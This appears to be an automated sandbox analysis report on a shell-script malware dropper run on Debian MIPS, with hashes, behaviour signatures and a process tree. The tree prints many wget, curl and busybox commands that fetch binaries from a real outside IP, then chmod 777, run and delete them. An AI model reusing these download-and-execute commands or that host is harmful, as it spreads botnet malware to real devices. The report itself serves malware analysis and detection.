Analysis
-
max time kernel
67s -
max time network
69s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
-
Size
10KB
-
MD5
5ecd8e3f2eb51a7dc020f24e33b8cc57
-
SHA1
be4322853738933aa75ef6ade68437e1c6290afe
-
SHA256
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f
-
SHA512
f43f15b94f1eab3f628a22d9dec691977126ced5801a808fc091f5847ab5cb1bf5bce49da1056fa82a1c14ccecddf1d0c76ecab6fcb74951c56b7c87a331dce1
-
SSDEEP
192:eyoVNmlHxyrasCqOpG+qpOVNmlHx3qOpG+0:e/VNmlRyrasH8VNmlRm
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 872 chmod 896 chmod 956 chmod 884 chmod 890 chmod 932 chmod 740 chmod 821 chmod 815 chmod 920 chmod 938 chmod 968 chmod 772 chmod 926 chmod 748 chmod 797 chmod 839 chmod 734 chmod 809 chmod 950 chmod 902 chmod 914 chmod 962 chmod 974 chmod 861 chmod 878 chmod 908 chmod 944 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ 735 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 741 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP 749 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM 774 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 799 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W 810 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p 816 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm 822 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 843 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU 862 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf 873 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 879 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm 885 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX 891 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W 897 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 903 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm 909 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 915 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU 921 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf 927 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 933 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p 939 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX 945 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm 951 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 957 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP 963 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM 969 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ 975 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 877 busybox 934 rm 931 busybox 933 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 875 wget 876 curl 879 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 880 rm 929 wget 930 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM curl File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf curl File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX curl File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP curl File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM curl File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 curl File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p curl File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 curl File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p curl File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO curl File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W curl File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP curl File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 curl File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ curl File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W curl File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm curl File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO curl File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX curl File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm curl File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ curl File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU curl File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm curl File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf curl File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 curl File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm curl File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU curl File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 curl File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 curl
Processes
-
/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:712
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:732
-
-
/bin/chmodchmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:736
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:739
-
-
/bin/chmodchmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:745
-
-
/bin/chmodchmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:752
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:769
-
-
/bin/chmodchmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:776
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:778
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:793
-
-
/bin/chmodchmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:802
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:803
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:808
-
-
/bin/chmodchmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:814
-
-
/bin/chmodchmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:820
-
-
/bin/chmodchmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:836
-
-
/bin/chmodchmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:857
-
-
/bin/chmodchmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:871
-
-
/bin/chmodchmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:877
-
-
/bin/chmodchmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:879
-
-
/bin/rmrm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:883
-
-
/bin/chmodchmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:889
-
-
/bin/chmodchmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:895
-
-
/bin/chmodchmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:901
-
-
/bin/chmodchmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:907
-
-
/bin/chmodchmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:913
-
-
/bin/chmodchmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:919
-
-
/bin/chmodchmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:925
-
-
/bin/chmodchmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:931
-
-
/bin/chmodchmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- File and Directory Permissions Modification
PID:932
-
-
